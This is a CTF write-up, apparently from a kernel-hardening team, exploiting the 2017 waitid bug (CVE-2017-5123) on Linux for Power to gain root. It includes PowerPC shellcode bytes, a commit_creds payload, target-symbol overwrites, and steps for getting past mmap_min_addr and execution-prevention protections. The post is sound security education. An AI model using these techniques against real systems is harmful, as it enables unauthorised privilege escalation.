The other kind of kernel hacking
Instead of writing mitigations, memory protections and sanitisers all day, I figured it'd be fun to get the team to try playing for the other team. It's a fun set of skills to learn, and it's a very hands-on way to understand why kernel hardening is so important. To that end, I decided to concoct a simple kernel CTF and enforce some mandatory fun. Putting this together, I had a few rules:
- it should be exploiting a real world vulnerability
- it should be on Power (since that's what we do around here)
- it should be conceptually simple to understand (and not require knowledge of network stacks or sandboxes etc)
- it's more important to be educational than to be realistic
So I threw something together and I think it did a decent job of meeting those targets, so let's go through it!
Stage 1: the bug
SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
		infop, int, options, struct rusage __user *, ru)
{
	struct rusage r;
	struct waitid_info info = {.status = 0};
	long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
	int signo = 0;
	if (err > 0) {
		signo = SIGCHLD;
		err = 0;
	}
	if (!err) {
		if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
			return -EFAULT;
	}
	if (!infop)
		return err;
	user_access_begin();
	unsafe_put_user(signo, &infop->si_signo, Efault);
	unsafe_put_user(0, &infop->si_errno, Efault);
	unsafe_put_user((short)info.cause, &infop->si_code, Efault);
	unsafe_put_user(info.pid, &infop->si_pid, Efault);
	unsafe_put_user(info.uid, &infop->si_uid, Efault);
	unsafe_put_user(info.status, &infop->si_status, Efault);
	user_access_end();
	return err;
Efault:
	user_access_end();
	return -EFAULT;
}
This is the implementation of the waitid syscall in Linux v4.13, released in September 2017. For our purposes it doesn't matter what the syscall is supposed to do - there's a serious bug here that will let us do very naughty things. Try and spot it yourself, though it may not be obvious unless you're familiar with the kernel's user access routines.
#define put_user(x, ptr) \
({ \
	__typeof__(*(ptr)) __user *_pu_addr = (ptr); \
 \
	access_ok(_pu_addr, sizeof(*(ptr))) ? \
		__put_user(x, _pu_addr) : -EFAULT; \
})
This is put_user() from arch/powerpc/include/asm/uaccess.h. The implementation goes deeper, but this tells us that the normal way the kernel would write to user memory involves calling access_ok() and only performing the write if the access was indeed OK (meaning the address is in user memory, not kernel memory). As the name may suggest, unsafe_put_user() skips that part, and for good reason - sometimes you want to do multiple user accesses at once. With SMAP/PAN/KUAP etc enabled, every put_user() will enable user access, perform its operation then disable it again, which is very inefficient. Instead, patterns like in waitid above are rather common - enable user access, perform a bunch of "unsafe" operations and then disable user access again.
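To make the efficiency argument concrete, here is a rough user-space model that simply counts how often the "user access window" is toggled. Every name in it (model_put_user, model_write_each, model_write_batched) is made up for illustration; none of this is kernel code.

```c
#include <assert.h>

/* Number of times the modelled user access window was opened or closed. */
static unsigned model_toggles;

static void model_allow(void)   { model_toggles++; }
static void model_prevent(void) { model_toggles++; }

/* Modelled put_user(): open the window, store, close the window. */
static void model_put_user(int value, int *dst)
{
	model_allow();
	*dst = value;
	model_prevent();
}

/* One full open/close cycle per store. Returns the toggle count. */
unsigned model_write_each(int *dst, const int *src, unsigned n)
{
	model_toggles = 0;
	for (unsigned i = 0; i < n; i++)
		model_put_user(src[i], &dst[i]);
	return model_toggles;
}

/* One open/close cycle around all stores. Returns the toggle count. */
unsigned model_write_batched(int *dst, const int *src, unsigned n)
{
	model_toggles = 0;
	model_allow();
	for (unsigned i = 0; i < n; i++)
		dst[i] = src[i];
	model_prevent();
	return model_toggles;
}
```

For the six fields waitid writes, the first style toggles twelve times and the batched style twice. The price of batching is that the range check no longer comes for free with each store.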
The bug in waitid is that access_ok() is never called, and thus there is no validation that the user-provided pointer infop is pointing to user memory instead of kernel memory. Calling waitid and pointing into kernel memory allows unprivileged users to write into whatever they're pointing at. Neat!
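As a sketch of what the missing check amounts to, the range test can be modelled in user space like this. MODEL_USER_LIMIT is an assumed, illustrative boundary (the real limit depends on kernel version and MMU configuration), and model_access_ok is a hypothetical name rather than the kernel's implementation.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Assumed, illustrative top of the user address range. */
#define MODEL_USER_LIMIT 0x0002000000000000ULL

/* The whole span [addr, addr + size) must sit below the user limit.
 * Written so that the arithmetic cannot overflow. */
bool model_access_ok(uint64_t addr, uint64_t size)
{
	if (size > MODEL_USER_LIMIT)
		return false;
	return addr <= MODEL_USER_LIMIT - size;
}
```

With a check of this shape in place, a destination like 0xc000000012345678 is rejected before any write happens, while an ordinary user address passes.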
This is CVE-2017-5123, summarised as "Insufficient data validation in waitid allowed an user to escape sandboxes on Linux". It's a primitive that can be used for more than that, but that's what its discoverer used it for, escaping the Chrome sandbox.
If you're curious, there's a handful of different writeups exploiting this bug for different things that you can search for. I suppose I'm now joining them!
A tangent: API design
Failing to enforce that a user-provided address to write to is actually in userspace is a hefty mistake, one that wasn't caught until after the code made it all the way to a tagged release (though the only distro release I could find with it was Ubuntu 17.10-beta2). Linux is big, complicated, fast-moving, and all that - there's always going to be bugs. It's not possible to prevent the entire developer base from ever making mistakes, but you can design better APIs so mistakes like this are much less likely to happen.
Let's have a look at the waitid syscall implementation as it is in upstream Linux at the time of writing.
SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
		infop, int, options, struct rusage __user *, ru)
{
	struct rusage r;
	struct waitid_info info = {.status = 0};
	long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
	int signo = 0;
	if (err > 0) {
		signo = SIGCHLD;
		err = 0;
		if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
			return -EFAULT;
	}
	if (!infop)
		return err;
	if (!user_write_access_begin(infop, sizeof(*infop)))
		return -EFAULT;
	unsafe_put_user(signo, &infop->si_signo, Efault);
	unsafe_put_user(0, &infop->si_errno, Efault);
	unsafe_put_user(info.cause, &infop->si_code, Efault);
	unsafe_put_user(info.pid, &infop->si_pid, Efault);
	unsafe_put_user(info.uid, &infop->si_uid, Efault);
	unsafe_put_user(info.status, &infop->si_status, Efault);
	user_write_access_end();
	return err;
Efault:
	user_write_access_end();
	return -EFAULT;
}
Notice any differences? Not a lot has changed, but instead of an unconditional user_access_begin(), there's now a call to user_write_access_begin(). Not only have the user access functions been split into read and write (though whether there's actually read/write granularity under the hood depends on the MMU-specific implementation), but the _begin() function takes a pointer and the size of the write. And what do you think that's doing...
static __must_check inline bool
user_write_access_begin(const void __user *ptr, size_t len)
{
	if (unlikely(!access_ok(ptr, len)))
		return false;
	might_fault();
	allow_write_to_user((void __user *)ptr, len);
	return true;
}
That's right! The missing access_ok() check from v4.13 is now part of the API for enabling user access, so you can't forget it (without trying really hard). If there's something else you should be doing every time you call a function (e.g. access_ok() when calling user_access_begin()), it should probably just be part of the function, especially if there's a security implication.
This bug was fixed by adding in the missing access_ok() check, but it's very cool to see that bugs like this are now much less likely to get written.
Stage 2: the primitive
Before we do anything too interesting, we should figure out what we actually have here. We point our pointer at 0xc000000012345678 (an arbitrary kernel address) then take a look in gdb, revealing the following:
pwndbg> x/10 0xc000000012345678
0xc000000012345678: 17 0 1 0
0xc000000012345688: 2141 1001 1 0
So we know that we can at least set something to zero, and there's some potential for more mischief. We could fork() a lot to change the value of the PID to make our write a bit more arbitrary, but to not get too fancy I figured we should just see where we could get by setting something either to zero or to something non-zero.
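To read the gdb dump field by field, it helps to model where each of the six stores lands. The struct below is a layout inferred from the dump for a 64-bit target, not a copy of the kernel headers, and its names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Inferred layout of the start of siginfo, one 32-bit word per field. */
struct model_siginfo_head {
	int32_t signo;    /* word 0 */
	int32_t err;      /* word 1: always written as 0 */
	int32_t code;     /* word 2 */
	int32_t pad;      /* word 3: alignment padding, never written */
	int32_t pid;      /* word 4 */
	uint32_t uid;     /* word 5 */
	int32_t status;   /* word 6 */
};

/* Apply the six stores to a buffer of 32-bit words and leave every
 * other word untouched. */
void model_waitid_stores(int32_t *words, int32_t signo, int32_t code,
			 int32_t pid, uint32_t uid, int32_t status)
{
	words[offsetof(struct model_siginfo_head, signo) / 4] = signo;
	words[offsetof(struct model_siginfo_head, err) / 4] = 0;
	words[offsetof(struct model_siginfo_head, code) / 4] = code;
	words[offsetof(struct model_siginfo_head, pid) / 4] = pid;
	words[offsetof(struct model_siginfo_head, uid) / 4] = (int32_t)uid;
	words[offsetof(struct model_siginfo_head, status) / 4] = status;
}
```

Feeding in the values from the dump (17, 1, 2141, 1001, 1) reproduces words 0 to 2 and 4 to 6, while words 3 and 7 keep whatever was there before. Word 1 is the guaranteed zero, and the others give us our "something non-zero".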
A few targets came to mind. We could spray around where we think creds are located to try and overwrite the effective user ID of a process to 0, making it run as root. We could go after something like SELinux, aiming for flags like selinux_enabled and selinux_enforcing. I'm sure there's other sandbox-type controls we could try and escape from, too.
None of these were taking my CTF in the direction I wanted it to go (which was shellcode running in the kernel), so I decided to turn the realism down a notch and aim for exploiting a null pointer dereference. We'd map our shellcode to *0, induce a null pointer dereference in the kernel, and then our exploit would work. Right?
So we're just going to go for a classic privilege escalation. We start as an unprivileged user and end up as root. Easy.
Stage 3: the target
I found an existing exploit doing the same thing I wanted to do, so I just stole the target from that. It has some comments in French which don't really help me, but thankfully I found another version with some additional comments - in Chinese. Oh well.
have_canfork_callback is a symbol that marks whether cgroup subsystems have a can_fork() callback that is checked when a fork is attempted. If we overwrite have_canfork_callback to be non-zero when can_fork is still NULL, then we win! We can reliably reproduce a null pointer dereference as soon as we fork().
I'm sure there's heaps of different symbols we could have hit, but this one has some nice properties. Any non-zero write is enough, we can trigger the dereference at a time in our control with fork(), and to cover our bases we can just set it back to 0 later.
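A toy model of why any non-zero value works, assuming the flag is treated as a bitmask with one bit per subsystem (that is an assumption of this sketch, as are the struct and function names). It reports which callback slot would be called through a NULL pointer instead of actually jumping there.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MODEL_SUBSYS_COUNT 16

/* Hypothetical stand-in for a subsystem with an optional callback. */
struct model_subsys {
	int (*can_fork)(void);
};

/* Walk the subsystems whose bit is set in the mask and return the index
 * of the first one whose callback is NULL, i.e. the call that would
 * branch to address 0. Returns -1 if no selected slot is NULL. */
int model_first_null_call(uint16_t mask, const struct model_subsys *subsys)
{
	for (int i = 0; i < MODEL_SUBSYS_COUNT; i++) {
		if (!(mask & (1u << i)))
			continue;
		if (subsys[i].can_fork == NULL)
			return i;
	}
	return -1;
}
```

With an all-NULL table, a mask of 0 is harmless and any mask with at least one bit set finds a NULL callback, which matches the "any non-zero write is enough" property.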
In our case, we had debug info and a debugger, so finding where the symbol was located in memory is pretty easy. There's also /proc/kallsyms which is great if it's enabled. Linux on Power doesn't yet support KASLR which also saves us a headache or two here, and you can feel free to ask me why it's low on the priority list.
So now we have a null pointer dereference. Now let's get that doing something!
Stage 4: preparing the exploit
Virtual memory is one heck of a drug. If the kernel is going to execute from 0x0, we just need to mmap() to 0! Easy.
Well, it's not that easy. Turning any null pointer dereference into an easy attack vector is not ideal, so users aren't allowed to mmap to low address ranges, in our case, below PAGE_SIZE. Surely there's nothing in the kernel that would try to dereference a pointer + PAGE_SIZE? Maybe that's for a future CTF...
There's a sysctl for this, so in the actual CTF we just did sysctl -w vm.mmap_min_addr=0 and moved on for brevity. As I was writing this I decided to make sure it was possible to bypass this without cheating by making use of our kernel write primitive, and sure enough, it works! I had to zero out both mmap_min_addr and dac_mmap_min_addr symbols, the latter seemingly required for filesystem interactions to work post-exploit.
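A quick way to see the restriction from user space is to ask for a fixed mapping at address 0 and look at what comes back. This is a minimal probe, not part of the CTF exploit, and try_map_page_zero is a name chosen here for illustration.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

/* Try to map one anonymous page at address 0.
 * Returns 0 if the mapping succeeded (it is unmapped again straight
 * away), or the errno value reported by mmap() if it failed. */
int try_map_page_zero(void)
{
	size_t len = (size_t)sysconf(_SC_PAGESIZE);
	void *p = mmap((void *)0, len, PROT_READ | PROT_WRITE,
		       MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);

	if (p == MAP_FAILED)
		return errno;
	munmap(p, len);
	return 0;
}
```

On a system with a non-zero minimum address, an unprivileged caller should typically see a permission error here, and 0 once the limit has been lowered.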
Now that we can trigger a null pointer dereference in the kernel and mmap() our shellcode to 0x0, we should probably get some shellcode. We want to escalate our privileges, and the easiest way to do that is the iconic commit_creds(prepare_kernel_cred(0)).
prepare_kernel_cred() is intended to produce a credential for a kernel task. Passing 0/NULL gets you the same credential that init runs with, which is about as escalated as our privileges can get. commit_creds() applies the given credential to the currently running task - thus making our exploit run as root.
As of somewhat recently it's a bit more complex than that, but we're still back in v4.13, so we just need a way to execute that from a triggered null pointer dereference.
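As a mental model only, the two calls can be pictured with heavily simplified stand-in types. Real kernel credentials carry far more state and are reference counted; every name below is hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* Simplified stand-ins for a credential and a task. */
struct model_cred { unsigned uid, gid, euid, egid; };
struct model_task { struct model_cred cred; };

/* The all-zero (root) credential that init is modelled as running with. */
static const struct model_cred model_init_cred = { 0, 0, 0, 0 };

/* Models prepare_kernel_cred(): with no reference task, hand back a
 * copy of the init credential. */
struct model_cred model_prepare_kernel_cred(const struct model_task *daemon)
{
	return daemon ? daemon->cred : model_init_cred;
}

/* Models commit_creds(): install the credential on the given task. */
void model_commit_creds(struct model_task *task, struct model_cred new_cred)
{
	task->cred = new_cred;
}
```

Chaining the two on a task that starts with uid 1001 leaves it with uid and euid 0, which is the whole trick.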
Stage 5: the shellcode
The blessing and curse of Power being a niche architecture is that it's hard to find existing exploits for. Perhaps lacking in grace and finesse, but effective nonetheless, is the shellcode I wrote myself:
static const unsigned char shellcode[] = {
	0x00, 0x00, 0xc0, 0x3b, // li r30, 0
	0x20, 0x00, 0x9e, 0xe9, // ld r12,32(r30)
	0x00, 0x00, 0xcc, 0xfb, // std r30,0(r12)
	0x18, 0x00, 0x9e, 0xe9, // ld r12,24(r30)
	0xa6, 0x03, 0x89, 0x7d, // mtctr r12
	0x20, 0x04, 0x80, 0x4e, // bctr
};
After the CTF I encouraged everyone to try writing their own shellcode and no one did, and I will take that as a sign that mine is flawlessly designed.
First we throw 0 into r30, which sounds like a register we'll get away with clobbering. We load the doubleword at offset 32 from the address in r30 into r12 (r30 is 0, so this reads from address 32). Then, we store the value of r30 (which is 0) to the address now held in r12 - writing zero to the address found at *32.
Then, we replace the contents of r12 with the value contained at address 24. Then, we move that value into the count register, and branch to the count register - redirecting execution to the address found at *24.
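If you'd like to check the bytes against the mnemonics, a small decoder is enough. The sketch below assumes the array holds little-endian instruction words (which is what the byte order suggests) and picks apart the opcode, register and displacement fields of the first four instructions; the helper names are made up.

```c
#include <assert.h>
#include <stdint.h>

/* The first four instructions of the shellcode, byte for byte. */
const unsigned char model_code[] = {
	0x00, 0x00, 0xc0, 0x3b,
	0x20, 0x00, 0x9e, 0xe9,
	0x00, 0x00, 0xcc, 0xfb,
	0x18, 0x00, 0x9e, 0xe9,
};

/* Assemble instruction number n from its four little-endian bytes. */
uint32_t insn_word(const unsigned char *code, unsigned n)
{
	const unsigned char *p = code + 4 * n;

	return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
	       (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Primary opcode: the top 6 bits. */
unsigned insn_opcode(uint32_t w) { return w >> 26; }
/* Target (or source) register: the next 5 bits. */
unsigned insn_rt(uint32_t w) { return (w >> 21) & 31; }
/* Base register: the 5 bits after that. */
unsigned insn_ra(uint32_t w) { return (w >> 16) & 31; }
/* Displacement of an ld/std: low 16 bits with the bottom two masked. */
unsigned insn_disp(uint32_t w) { return w & 0xfffc; }
```

The first word decodes as primary opcode 14 (addi, of which li is the form with a zero base register) targeting r30, and the two loads decode as opcode 58 into r12 with base r30 and displacements 32 and 24.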
I wrote it this way so participants would have to understand what the shellcode was trying to do to be able to get any use out of it. It expects two addresses to be placed immediately after it terminates and it's up to you to figure out what those addresses should be!
In our case, everyone figured out pretty quickly that *24 should point at our very classic privesc:
void get_root() {
	if (commit_creds && prepare_kernel_cred)
		commit_creds(prepare_kernel_cred(0));
}
Addresses for those kernel symbols need to be obtained first, but we're experts at that now. So we add in:
*(unsigned long *)24 = (unsigned long)get_root;
And that part's sorted. How good is C?
No one guessed what address we were zeroing, though, and the answer is have_canfork_callback. Without mending that, the kernel will keep attempting to execute from address 0, which we don't want. We only need it to do that once!
So we wrap up with
*(unsigned long *)32 = have_canfork_callback;
and our shellcode's ready to go!
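Why 24 and 32? The six instructions occupy 24 bytes, so the two 8-byte slots sit directly after them. A user-space model of the page (with hypothetical names, and a stand-in callback instead of the real get_root) makes the layout and the control flow easy to check.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Model of the page mapped at address 0. */
struct model_page_zero {
	uint32_t insns[6];   /* offsets 0..23: the six instructions */
	uint64_t target;     /* offset 24: address to branch to */
	uint64_t flag_addr;  /* offset 32: address to zero */
};

/* Set by the stand-in callback so the model's effect can be observed. */
int model_called;

/* Stand-in for get_root(); it only records that it ran. */
void model_get_root(void)
{
	model_called = 1;
}

/* What the six instructions do, written as C against the model page.
 * The final branch is modelled as a plain function call. */
void model_run(const struct model_page_zero *page)
{
	/* ld r12,32(r30); std r30,0(r12) */
	*(uint64_t *)(uintptr_t)page->flag_addr = 0;
	/* ld r12,24(r30); mtctr r12; bctr */
	((void (*)(void))(uintptr_t)page->target)();
}
```

Note that std stores a full doubleword, so in this model (and, presumably, in the real thing) eight bytes at the flag's address are zeroed rather than just the flag itself.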
Stage 6: it doesn't work
We've had good progress so far - we needed a way to get the kernel to execute from address 0 and we found a way to do that, and we needed to mmap to 0 and we found a way to do that. And yet, running the exploit doesn't work. How come?
Unable to handle kernel paging request for instruction fetch
Faulting instruction address: 0x00000000
Oops: Kernel access of bad area, sig: 11 [#2]
The MMU has ended our fun. KUEP is enabled (SMEP on x86, PXN on ARM) so the MMU is enforcing that the kernel can't execute from user addresses. I gave everyone a bit of a trick question here - how can you get around this purely from the qemu command line?
The way I did it wasn't to pass nosmep (and I'm not even sure that was implemented for powerpc in v4.13 anyway), it was to change from -cpu POWER9 to -cpu POWER8. Userspace execution prevention wasn't implemented in the MMU until POWER9, so reverting to an older processor was a cheeky way to get around that.
Stage 7: victory!
Putting all of that together, we have a successful privilege escalation from attacking the kernel.
/ $ ./exploit
Overwriting mmap_min_addr...
Overwriting dac_mmap_min_addr...
Overwriting have_canfork_callback...
Successfully acquired root shell!
/ # whoami
root
It's wild to think that even an exploit this simple would have been possible in the "real world" back in 2017, so it really highlights the value of kernel hardening! It made for a good introduction to kernel exploitation for me and my team and wasn't too contrived for the sake of simplicity.
Whether you're a beginner or an expert at kernel exploitation (or somewhere vaguely in the middle like me), I hope you found this interesting. There's lots of great PoCs, writeups and papers out there to learn from and CTFs to try if you want to learn more!